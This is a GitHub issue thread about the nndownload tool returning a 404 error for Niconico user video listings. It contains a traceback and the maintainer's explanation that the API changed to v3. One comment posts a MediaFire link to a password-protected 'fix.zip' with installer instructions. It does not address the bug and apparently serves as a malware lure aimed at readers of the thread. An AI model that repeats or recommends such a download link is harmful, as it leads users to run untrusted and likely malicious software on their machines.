### ISSUE TITLE
New user videos API endpoint

### ISSUE THREAD

**Issue by okaits** [AlexAplin/nndownload#188]
When I tried to `nndownload https://www.nicovideo.jp/user/...`, I got an HTTP 404 error.
Here's my output:

```
$ nndownload --session-cookie <user_session_...> https://www.nicovideo.jp/user/<target id>
Using provided session cookie.
Session cookie read as string.
Requesting videos from user <target id>...
HTTPError: 404 Client Error: Not Found for url: https://nvapi.nicovideo.jp/v1/users/<target id>/videos?sortKey=registeredAt&sortOrder=desc&pageSize=25&page=1
Traceback (most recent call last):
  File "/home/okaits/anaconda3/bin/nndownload", line 8, in <module>
    sys.exit(cli())
             ^^^^^
  File "/home/okaits/anaconda3/lib/python3.12/site-packages/nndownload/nndownload.py", line 2187, in cli
    main()
  File "/home/okaits/anaconda3/lib/python3.12/site-packages/nndownload/nndownload.py", line 2164, in main
    process_url_mo(session, url_mo)
  File "/home/okaits/anaconda3/lib/python3.12/site-packages/nndownload/nndownload.py", line 2066, in process_url_mo
    request_user(session, url_id)
  File "/home/okaits/anaconda3/lib/python3.12/site-packages/nndownload/nndownload.py", line 1091, in request_user
    videos_request.raise_for_status()
  File "/home/okaits/anaconda3/lib/python3.12/site-packages/requests/models.py", line 1021, in raise_for_status
    raise HTTPError(http_error_msg, response=self)
requests.exceptions.HTTPError: 404 Client Error: Not Found for url: https://nvapi.nicovideo.jp/v1/users/<target id>/videos?sortKey=registeredAt&sortOrder=desc&pageSize=25&page=1

```

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AlexAplin** [comment]
API was upgraded to v3

**Comment by AlexAplin** [comment]
There's now a `sensitiveContents` param and items are nested to have a `series` field, doesn't look like much else changed.
